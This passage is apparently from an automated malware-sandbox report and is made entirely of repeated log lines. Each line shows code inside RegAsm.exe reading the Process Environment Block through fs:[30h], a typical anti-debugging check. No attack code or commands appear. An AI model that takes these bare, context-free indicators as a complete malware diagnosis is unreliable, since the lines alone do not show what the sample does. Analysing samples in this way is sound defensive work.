            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E016 mov eax, dword ptr fs:[00000030h]7_2_02E1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA020 mov eax, dword ptr fs:[00000030h]7_2_02DFA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFC020 mov eax, dword ptr fs:[00000030h]7_2_02DFC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED61E5 mov eax, dword ptr fs:[00000030h]7_2_02ED61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E251EF mov eax, dword ptr fs:[00000030h]7_2_02E251EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E051ED mov eax, dword ptr fs:[00000030h]7_2_02E051ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E301F8 mov eax, dword ptr fs:[00000030h]7_2_02E301F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED51CB mov eax, dword ptr fs:[00000030h]7_2_02ED51CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC61C3 mov eax, dword ptr fs:[00000030h]7_2_02EC61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC61C3 mov eax, dword ptr fs:[00000030h]7_2_02EC61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3D1D0 mov eax, dword ptr fs:[00000030h]7_2_02E3D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3D1D0 mov ecx, dword ptr fs:[00000030h]7_2_02E3D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA197 mov eax, dword ptr fs:[00000030h]7_2_02DFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA197 mov eax, dword ptr fs:[00000030h]7_2_02DFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFA197 mov eax, dword ptr fs:[00000030h]7_2_02DFA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EB11A4 mov eax, dword ptr fs:[00000030h]7_2_02EB11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1B1B0 mov eax, dword ptr fs:[00000030h]7_2_02E1B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E40185 mov eax, dword ptr fs:[00000030h]7_2_02E40185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBC188 mov eax, dword ptr fs:[00000030h]7_2_02EBC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBC188 mov eax, dword ptr fs:[00000030h]7_2_02EBC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E57190 mov eax, dword ptr fs:[00000030h]7_2_02E57190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8019F mov eax, dword ptr fs:[00000030h]7_2_02E8019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFC156 mov eax, dword ptr fs:[00000030h]7_2_02DFC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E99179 mov eax, dword ptr fs:[00000030h]7_2_02E99179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF9148 mov eax, dword ptr fs:[00000030h]7_2_02DF9148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF172 mov eax, dword ptr fs:[00000030h]7_2_02DFF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov eax, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov eax, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov ecx, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov eax, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E94144 mov eax, dword ptr fs:[00000030h]7_2_02E94144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E07152 mov eax, dword ptr fs:[00000030h]7_2_02E07152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E06154 mov eax, dword ptr fs:[00000030h]7_2_02E06154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E06154 mov eax, dword ptr fs:[00000030h]7_2_02E06154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED5152 mov eax, dword ptr fs:[00000030h]7_2_02ED5152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E30124 mov eax, dword ptr fs:[00000030h]7_2_02E30124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E01131 mov eax, dword ptr fs:[00000030h]7_2_02E01131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E01131 mov eax, dword ptr fs:[00000030h]7_2_02E01131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB136 mov eax, dword ptr fs:[00000030h]7_2_02DFB136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB136 mov eax, dword ptr fs:[00000030h]7_2_02DFB136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB136 mov eax, dword ptr fs:[00000030h]7_2_02DFB136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFB136 mov eax, dword ptr fs:[00000030h]7_2_02DFB136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EAA118 mov ecx, dword ptr fs:[00000030h]7_2_02EAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EAA118 mov eax, dword ptr fs:[00000030h]7_2_02EAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EAA118 mov eax, dword ptr fs:[00000030h]7_2_02EAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EAA118 mov eax, dword ptr fs:[00000030h]7_2_02EAA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC0115 mov eax, dword ptr fs:[00000030h]7_2_02EC0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2D6E0 mov eax, dword ptr fs:[00000030h]7_2_02E2D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E2D6E0 mov eax, dword ptr fs:[00000030h]7_2_02E2D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E936EE mov eax, dword ptr fs:[00000030h]7_2_02E936EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E936EE mov eax, dword ptr fs:[00000030h]7_2_02E936EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E936EE mov eax, dword ptr fs:[00000030h]7_2_02E936EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E936EE mov eax, dword ptr fs:[00000030h]7_2_02E936EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E936EE mov eax, dword ptr fs:[00000030h]7_2_02E936EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E936EE mov eax, dword ptr fs:[00000030h]7_2_02E936EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E336EF mov eax, dword ptr fs:[00000030h]7_2_02E336EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E7E6F2 mov eax, dword ptr fs:[00000030h]7_2_02E7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E7E6F2 mov eax, dword ptr fs:[00000030h]7_2_02E7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E7E6F2 mov eax, dword ptr fs:[00000030h]7_2_02E7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E7E6F2 mov eax, dword ptr fs:[00000030h]7_2_02E7E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E806F1 mov eax, dword ptr fs:[00000030h]7_2_02E806F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E806F1 mov eax, dword ptr fs:[00000030h]7_2_02E806F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBD6F0 mov eax, dword ptr fs:[00000030h]7_2_02EBD6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0B6C0 mov eax, dword ptr fs:[00000030h]7_2_02E0B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0B6C0 mov eax, dword ptr fs:[00000030h]7_2_02E0B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0B6C0 mov eax, dword ptr fs:[00000030h]7_2_02E0B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0B6C0 mov eax, dword ptr fs:[00000030h]7_2_02E0B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0B6C0 mov eax, dword ptr fs:[00000030h]7_2_02E0B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0B6C0 mov eax, dword ptr fs:[00000030h]7_2_02E0B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC16CC mov eax, dword ptr fs:[00000030h]7_2_02EC16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC16CC mov eax, dword ptr fs:[00000030h]7_2_02EC16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC16CC mov eax, dword ptr fs:[00000030h]7_2_02EC16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC16CC mov eax, dword ptr fs:[00000030h]7_2_02EC16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A6C7 mov ebx, dword ptr fs:[00000030h]7_2_02E3A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A6C7 mov eax, dword ptr fs:[00000030h]7_2_02E3A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EBF6C7 mov eax, dword ptr fs:[00000030h]7_2_02EBF6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E316CF mov eax, dword ptr fs:[00000030h]7_2_02E316CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3C6A6 mov eax, dword ptr fs:[00000030h]7_2_02E3C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E366B0 mov eax, dword ptr fs:[00000030h]7_2_02E366B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8368C mov eax, dword ptr fs:[00000030h]7_2_02E8368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8368C mov eax, dword ptr fs:[00000030h]7_2_02E8368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8368C mov eax, dword ptr fs:[00000030h]7_2_02E8368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E8368C mov eax, dword ptr fs:[00000030h]7_2_02E8368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF76B2 mov eax, dword ptr fs:[00000030h]7_2_02DF76B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF76B2 mov eax, dword ptr fs:[00000030h]7_2_02DF76B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DF76B2 mov eax, dword ptr fs:[00000030h]7_2_02DF76B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E04690 mov eax, dword ptr fs:[00000030h]7_2_02E04690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E04690 mov eax, dword ptr fs:[00000030h]7_2_02E04690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFD6AA mov eax, dword ptr fs:[00000030h]7_2_02DFD6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFD6AA mov eax, dword ptr fs:[00000030h]7_2_02DFD6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC866E mov eax, dword ptr fs:[00000030h]7_2_02EC866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02EC866E mov eax, dword ptr fs:[00000030h]7_2_02EC866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A660 mov eax, dword ptr fs:[00000030h]7_2_02E3A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3A660 mov eax, dword ptr fs:[00000030h]7_2_02E3A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E39660 mov eax, dword ptr fs:[00000030h]7_2_02E39660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E39660 mov eax, dword ptr fs:[00000030h]7_2_02E39660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E32674 mov eax, dword ptr fs:[00000030h]7_2_02E32674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1C640 mov eax, dword ptr fs:[00000030h]7_2_02E1C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E36620 mov eax, dword ptr fs:[00000030h]7_2_02E36620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E38620 mov eax, dword ptr fs:[00000030h]7_2_02E38620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1E627 mov eax, dword ptr fs:[00000030h]7_2_02E1E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0262C mov eax, dword ptr fs:[00000030h]7_2_02E0262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02ED5636 mov eax, dword ptr fs:[00000030h]7_2_02ED5636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E3F603 mov eax, dword ptr fs:[00000030h]7_2_02E3F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E31607 mov eax, dword ptr fs:[00000030h]7_2_02E31607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E1260B mov eax, dword ptr fs:[00000030h]7_2_02E1260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E7E609 mov eax, dword ptr fs:[00000030h]7_2_02E7E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E03616 mov eax, dword ptr fs:[00000030h]7_2_02E03616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E03616 mov eax, dword ptr fs:[00000030h]7_2_02E03616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02DFF626 mov eax, dword ptr fs:[00000030h]7_2_02DFF626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E42619 mov eax, dword ptr fs:[00000030h]7_2_02E42619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0D7E0 mov ecx, dword ptr fs:[00000030h]7_2_02E0D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E227ED mov eax, dword ptr fs:[00000030h]7_2_02E227ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E227ED mov eax, dword ptr fs:[00000030h]7_2_02E227ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E227ED mov eax, dword ptr fs:[00000030h]7_2_02E227ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E047FB mov eax, dword ptr fs:[00000030h]7_2_02E047FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E047FB mov eax, dword ptr fs:[00000030h]7_2_02E047FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E0C7C0 mov eax, dword ptr fs:[00000030h]7_2_02E0C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E057C0 mov eax, dword ptr fs:[00000030h]7_2_02E057C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E057C0 mov eax, dword ptr fs:[00000030h]7_2_02E057C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02E057C0 mov eax, dword ptr fs:[00000030h]7_2_02E057C0
